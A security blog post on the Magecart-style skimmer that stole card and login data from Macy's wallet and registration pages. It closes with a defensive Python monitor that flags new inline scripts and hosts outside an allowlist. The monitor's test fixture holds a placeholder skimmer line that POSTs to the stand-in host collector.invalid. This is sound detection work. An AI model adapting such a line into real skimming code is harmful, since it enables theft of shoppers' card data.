Macy’s online store was attacked in October, resulting in a breach of credit card information for a “small” number of customers. Macy’s chose not to define small – possibly they don’t really know. Macy’s says that the attack was live for only a week, which says something positive about their security monitoring and alerting system. The good news for Macy’s, if there is any good news in a breach, is that it happened BEFORE the California Consumer Privacy Act came into force. Under that law, California customers have a private right of action in case of a breach without having to show specific harm, so the breach could have gotten a lot more expensive than it already will be (see breach announcement here).
The basics of the breach are typical of one of the many Magecart skimming breaches. An unauthorized person inserted malicious code into the Macy’s web site that captured credit card information and sent it to the hacker.
The first problem, of course, is how someone got the access needed to insert unauthorized code, but again, that is a normal question with all of the thousands of Magecart attacks. Sometimes hackers do this by infecting third party libraries that the target web site uses. That does not appear to be the case here. Likely, either they found a security vulnerability, which can take a lot of time, or they compromised a web site admin’s credentials through a phishing attack.
What is different about this credit card skimmer is that the attackers spent significant time researching how Macy’s web site worked and inserted the code in only two areas, to decrease the likelihood of being detected.
The first area is the web site credit card wallet page. Since the credit card digits are typically masked on the wallet page, these hackers only hooked into the pages that allow a customer to add a new card, delete a card or edit a card. This code would only work on MACYS.COM. RiskIQ says this is a new attack vector.
The second place they attacked is the new account registration page. This allows them to steal a user’s credentials in addition to a credit card.
This was a very targeted attack. The web site the credentials were sent to was created on September 24th, the code injected on October 7th and the code disabled on October 15th. The total lifetime was about three weeks.
They even flagged the data for where it came from: guest checkout, new user registration or wallet page.
The fact that they were willing to spend enough time to figure out what the targets of opportunity were, customize the code to work for this one site and then target the site for a blitz-style attack means that the attack is very profitable.
Is this the next phase these attacks are moving to? Possibly.
The fact that Macy’s was able to detect this so quickly means that their monitoring and alerting solution was quite effective. Had they waited for these cards to show up on the black market, detection could have taken 30 days or longer.
How good is your alerting and monitoring solution? If you need help with setting up a cost-effective one, contact us. Source: CSO Online
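The kind of monitoring the post credits Macy’s with can be as simple as inventorying the scripts on each payment-related page and alerting when an inline script or script host appears that was not there at deployment. The following is an added example written for this post, not code from Macy’s, RiskIQ or CSO Online: it hashes the inline scripts of a known-good snapshot, then checks a later snapshot for unbaselined scripts and for hosts outside an allowlist. The allowlist, both HTML snapshots and the hosts shop.example and collector.invalid are constructed placeholders, and the injected script body is a non-functional stand-in whose only relevant property is the foreign host it names.

```python
"""Script-inventory monitor for checkout and wallet pages (constructed example)."""
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts permitted to serve scripts to the page or be named inside them (constructed).
ALLOWED_HOSTS = {"shop.example", "static.shop.example"}

# Known-good wallet page as deployed (constructed snapshot).
BASELINE_HTML = """<html><body>
<form id="wallet"><input id="cardnum"><button>Save card</button></form>
<script src="https://static.shop.example/js/wallet.js"></script>
<script>document.getElementById("wallet").dataset.ready = "1";</script>
</body></html>"""

# The same page after an unauthorized inline script was inserted (constructed).
# The body is a placeholder; the monitor only cares that it is new and names a foreign host.
TAMPERED_HTML = BASELINE_HTML.replace(
    "</body>",
    '<script>fetch("https://collector.invalid/c", {method: "POST", body: "fields"});</script>\n</body>',
)


class _ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from one page."""

    def __init__(self):
        super().__init__()
        self.external = []      # values of src attributes
        self.inline = []        # text of inline <script> elements
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf).strip())


def inventory(html):
    """Return (external script URLs, inline script bodies) for a page."""
    collector = _ScriptCollector()
    collector.feed(html)
    return collector.external, collector.inline


def sha256(text):
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def baseline_hashes(html):
    """Hash every inline script of a known-good snapshot; store this at deploy time."""
    _, inline = inventory(html)
    return {sha256(body) for body in inline}


def check_page(html, baseline, allowed_hosts=ALLOWED_HOSTS):
    """Return (kind, detail) findings for a later snapshot of the same page."""
    findings = []
    external, inline = inventory(html)
    for src in external:
        host = urlparse(src).hostname          # None for same-origin relative paths
        if host and host not in allowed_hosts:
            findings.append(("unknown_script_host", host))
    for body in inline:
        if sha256(body) in baseline:
            continue
        findings.append(("unbaselined_inline_script", sha256(body)[:12]))
        # An unbaselined script that names a host outside the allowlist is the
        # highest-priority alert: it is where captured data would be sent.
        for url in re.findall(r"https?://[^\s'\"<>]+", body):
            host = urlparse(url).hostname
            if host and host not in allowed_hosts:
                findings.append(("foreign_host_in_script", host))
    return findings


if __name__ == "__main__":
    baseline = baseline_hashes(BASELINE_HTML)
    print("baseline:", check_page(BASELINE_HTML, baseline))
    print("tampered:", check_page(TAMPERED_HTML, baseline))
```

In practice the baseline is captured from the build artefact rather than from a live fetch, so that a page which was already tampered with cannot become its own baseline, and the check runs on a schedule against the live pages that handle card entry, registration and the wallet. A Content-Security-Policy with a report endpoint gives the same signal from the browser side; the two complement each other.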